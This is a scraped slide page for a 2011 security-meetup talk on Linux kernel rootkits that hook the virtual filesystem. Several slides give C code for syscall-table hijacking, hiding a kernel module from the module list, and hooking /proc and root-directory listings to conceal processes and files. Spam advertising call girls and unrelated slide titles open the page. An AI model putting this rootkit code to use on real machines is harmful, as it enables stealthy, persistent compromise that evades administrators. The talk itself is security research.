08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

Confraria SECURITY & IT - Lisbon Set 29, 2011

  • 1. Linux rootkits without syscall patching, (the VFS way) Confraria SECURITY & IT – 28 Set 2011
  • 2. #> whoami §  Ricardo Mourato – 25 yo §  Computer Science Degree §  InfoSec & SuperBock Stout addicted §  OS X, Slackware, FreeBSD, OpenBSD, Solaris fanatic §  Java, .Net, Python, Ruby, C, C++, ASM Lover §  Windows (All versions) , Perl (All versions) and Printers (Yes, they came from hell !) hater §  root, right here :) 2
  • 3. Agenda §  Linux rootkits – brief talk §  Linux 2.{5,6} kernel – what changed ? §  The Virtual Filesystem (VFS) §  Meet /proc, our friend! §  Introducing §  Show time J §  Retrospect §  Questions & Answers 3
  • 4. Linux rootkits – how they were? §  In the beginning… §  User-land Trojaned binaries mostly §  Easy to spot §  Easy to code §  However, hard to hide! §  LRK5 was a good bastard… 4
  • 5. Linux rootkits – how they were? §  Not so far away… §  The Kernel-land approach §  Loadable Kernel Modules or /dev/kmem “patching” §  Syscall patching §  Easy to code §  Less easy to find Adore & suckit were also good bastards! 5
  • 6. Linux rootkits – how they were? extern void *sys_call_table[]; int init_module(void) { original_call = sys_call_table[__NR_open]; sys_call_table[__NR_open] = evil_open; return 0; } 6
  • 7. Linux 2.{5,6} – what changed? §  Main change: §  OMG! sys_call_table[] no longer exported!!! §  Even if you find it, it will be read-only §  Workaround: §  Find IDT §  Find the 0x80 interrupt §  Get the system_call() function location §  Use gdb kung fu and search memory for sys_call_table[] within this function 7
  • 8. Linux 2.{5,6} – what changed? $ gdb -q /usr/src/linux/vmlinux (no debugging symbols found)...(gdb) disass system_call … 0xc0106bf4 : call *0xc01e0f18(,%eax,4) … (gdb) print &sys_call_table $1 = ( *) 0xc01e0f18 8
  • 9. The Virtal Filesystem §  Is the primary interface to underlying filesystems (common file model) §  Exports a set of interfaces for every individual filesystem §  Each filesystem must “implement” this interface in order to become a common file model §  Some interesting players are: §  struct dentry; §  struct file_operations; §  struct inode_operations; 9
  • 10. /proc is our friend §  So… everything in linux “is a file” right? §  Including the ones located at /proc even if “in memory” §  And… most user-land tools rely on /proc to get information! §  This tools include: §  ps §  netstat §  top §  mount §  And many, many others… §  Remember struct file_operations ? J 10
  • 11. Introducing Fuckit… §  Fu Control Kit (just in case!) §  A research born VFS rootkit capable of: §  Hide itself ß No sh*t sherlock? §  Hide processes §  Hide files and directories §  TTY sniffing 11
  • 12. Module hiding §  Modules are linked together in a double link list maintained by the kernel §  The kernel have internal functions to “unlink” the unloaded modules from the list §  Just use them wisely J 12
  • 13. Module hiding static struct module *m = THIS_MODULE; void hideme(void){ kobject_del(&m->mkobj.kobj); list_del(&m->list); } 13
  • 14. “Hook” the Virtual Filesystem (/proc) static struct file_operations *proc_fops; ß remember again? J void hook_proc(void){ /* we are not /proc yet */ key = create_proc_entry(KEY,0666,NULL); /* now we become /proc :) */ proc = key->parent; /* save the original, we will need it later*/ proc_fops = (struct file_operations *)proc->proc_fops; original_proc_readdir = proc_fops->readdir; /* tha hook */ proc_fops->readdir = fuckit_proc_readdir; } 14
  • 15. “Hook” the Virtual Filesystem (/) static struct file *f; int hook_root(void){ f = filp_open("/",O_RDONLY,0600); if(IS_ERR(f)){ return -1; } original_root_readdir = f->f_op->readdir; f->f_op->readdir=fuckit_root_readdir; filp_close(f,NULL); return 0; } 15
  • 16. Process hiding static inline int fuckit_proc_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){ //our hidden PID :) if(!strcmp(name,HIDDEN_PID) || !strcmp(name,KEY)){ return 0; } return original_filldir(__buf,name,namelen,offset,ino,d_type); } static inline int fuckit_proc_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_filldir = filldir; return original_proc_readdir(filp,dirent,fuckit_proc_filldir); } 16
  • 17. File and Directory hiding static int fuckit_root_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){ //if is our hidden file/directory return nothing! :) if(strncmp(name,HIDDEN_DIR,namelen)==0){ return 0; } return original_root_filldir(__buf,name,namelen,offset,ino,d_type); } static int fuckit_root_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_root_filldir = filldir; return original_root_readdir(filp,dirent,fuckit_root_filldir); } 17
  • 19. Retrospect §  Syscall patching in 2.6 kernel is a true “pain in the a**” §  VFS hooks, they also do the job! §  It is a good approach, however it has some cons §  It is possible to “brute force” /proc for hidden pids §  You should let the Linux scheduler do this job! §  Hypervisor rootkits will kill -9 every kernel rookits on earth! J 19
  • 20. References §  IBM developerWorks “Anatomy of the Linux filesystem”. Internet: http://www.ibm.com/developerworks/linux/library/l-linux-filesystem/. [Jan 25, 2011] §  WangYao “Rootkit on Linux x86 v2.6” [Apr 21, 2009] §  Dump “hideme (ng)”. Internet: http://trace.dump.cz/projects.php [Jan 25, 2011] §  Ubra “Process Hiding & The Linux scheduler”. Internet: http://www.phrack.org/issues.html?issue=63&id=18 [Jan 25, 2011] 20
  • 21. 21